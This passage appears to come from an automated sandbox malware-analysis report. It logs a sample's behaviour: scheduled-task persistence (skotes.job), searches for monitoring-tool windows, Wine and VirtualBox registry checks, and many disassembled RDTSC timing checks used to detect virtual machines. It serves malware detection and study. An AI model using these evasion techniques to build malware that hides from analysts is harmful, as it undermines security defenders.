Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29AB95 second address: 29AB9A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29AB9A second address: 29ABA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29ABA5 second address: 29ABA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B3F72 second address: 2B3F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B40A8 second address: 2B40AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B4365 second address: 2B43A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95588494AFh 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b pushad 0x0000000c jl 00007F95588494B2h 0x00000012 pushad 0x00000013 jmp 00007F95588494B0h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B453D second address: 2B4543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B4543 second address: 2B4553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95588494ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B46D6 second address: 2B46F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9558C389FFh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B46F3 second address: 2B4722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F95588494ACh 0x0000000e popad 0x0000000f jbe 00007F95588494B0h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6970 second address: 2B697A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9558C389F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B697A second address: 2B69C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F95588494ADh 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 jmp 00007F95588494B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F95588494ABh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6BD2 second address: 2B6BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6BD6 second address: 2B6BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6BE1 second address: 2B6C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 jmp 00007F9558C38A03h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1A44h], edx 0x00000019 push 00000000h 0x0000001b mov ecx, 7B013272h 0x00000020 push C3E0DA5Ch 0x00000025 pushad 0x00000026 js 00007F9558C38A04h 0x0000002c jmp 00007F9558C389FEh 0x00000031 jp 00007F9558C389F8h 0x00000037 popad 0x00000038 add dword ptr [esp], 3C1F2624h 0x0000003f mov dword ptr [ebp+122D30BEh], esi 0x00000045 push 00000003h 0x00000047 xor ecx, dword ptr [ebp+122D2CB0h] 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push eax 0x00000052 call 00007F9558C389F8h 0x00000057 pop eax 0x00000058 mov dword ptr [esp+04h], eax 0x0000005c add dword ptr [esp+04h], 00000015h 0x00000064 inc eax 0x00000065 push eax 0x00000066 ret 0x00000067 pop eax 0x00000068 ret 0x00000069 and si, 6FA7h 0x0000006e push 00000003h 0x00000070 jmp 00007F9558C389FEh 0x00000075 push AD3D6373h 0x0000007a pushad 0x0000007b push edi 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6C84 second address: 2B6C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6C8C second address: 2B6CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 add dword ptr [esp], 12C29C8Dh 0x0000000d adc edx, 52FC2300h 0x00000013 xor dword ptr [ebp+122DBA86h], ecx 0x00000019 lea ebx, dword ptr [ebp+1244B89Bh] 0x0000001f mov dword ptr [ebp+122D2D8Bh], ebx 0x00000025 xchg eax, ebx 0x00000026 jns 00007F9558C38A07h 0x0000002c jmp 00007F9558C38A01h 0x00000031 push eax 0x00000032 pushad 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6CCE second address: 2B6CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B6CD7 second address: 2B6CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6DF7 second address: 2D6DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6DFB second address: 2D6DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6DFF second address: 2D6E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F95588494AEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6E0F second address: 2D6E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6E13 second address: 2D6E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F95588494A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D556C second address: 2D5572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D5572 second address: 2D5578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D5578 second address: 2D5582 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D5582 second address: 2D5586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D5586 second address: 2D558A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D570B second address: 2D572B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F95588494A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D572B second address: 2D5747 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9558C389F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F9558C389FEh 0x00000014 jg 00007F9558C389F6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D5747 second address: 2D575D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95588494AEh 0x00000008 jc 00007F95588494A6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D5DD8 second address: 2D5DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D5F4F second address: 2D5F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29C5E7 second address: 29C5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29C5F2 second address: 29C5F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29C5F6 second address: 29C5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6877 second address: 2D6881 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95588494A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6881 second address: 2D688D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9558C389F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D688D second address: 2D68BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B7h 0x00000007 jmp 00007F95588494ADh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F95588494AEh 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6A2A second address: 2D6A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6A2E second address: 2D6A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6CBF second address: 2D6CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C389FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6CD1 second address: 2D6CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D6CD5 second address: 2D6CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D9CE3 second address: 2D9CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F95588494AEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D9CFB second address: 2D9CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D9CFF second address: 2D9D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F95588494A8h 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2D9D17 second address: 2D9D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AB84F second address: 2AB855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AB855 second address: 2AB859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AB859 second address: 2AB875 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AB875 second address: 2AB87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A30E9 second address: 2A30ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A30ED second address: 2A310A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F9558C389FEh 0x0000000f jnl 00007F9558C389F6h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A310A second address: 2A310E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A310E second address: 2A3112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A3112 second address: 2A3118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A3118 second address: 2A312F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9558C38A02h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DDE54 second address: 2DDE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DDE58 second address: 2DDE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DDE5E second address: 2DDE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E3080 second address: 2E308C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9558C389F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E31BF second address: 2E31C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E345A second address: 2E346F instructions: 0x00000000 rdtsc 0x00000002 js 00007F9558C389F6h 0x00000008 jp 00007F9558C389F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E5A93 second address: 2E5A9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E5A9D second address: 2E5AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9558C389F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E5AA7 second address: 2E5AB1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95588494A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E5AB1 second address: 2E5AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F9558C38A07h 0x00000010 jmp 00007F9558C389FBh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E610B second address: 2E610F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E61F8 second address: 2E624F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 62ADA007h 0x00000010 mov edi, dword ptr [ebp+122D3657h] 0x00000016 call 00007F9558C389F9h 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F9558C38A07h 0x00000022 jnl 00007F9558C389F6h 0x00000028 popad 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 pop edx 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E624F second address: 2E6253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6253 second address: 2E6257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6554 second address: 2E656E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95588494A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95588494AEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E656E second address: 2E657B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E69A2 second address: 2E69BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007F95588494A6h 0x00000011 jp 00007F95588494A6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6EC2 second address: 2E6F01 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9558C389F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], ebx 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F9558C389F8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D2AA4h] 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6F01 second address: 2E6F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6F05 second address: 2E6F19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E6F19 second address: 2E6F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E7017 second address: 2E7045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9558C38A02h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E748C second address: 2E749D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 je 00007F95588494AEh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E8927 second address: 2E892D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9995 second address: 2E9999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
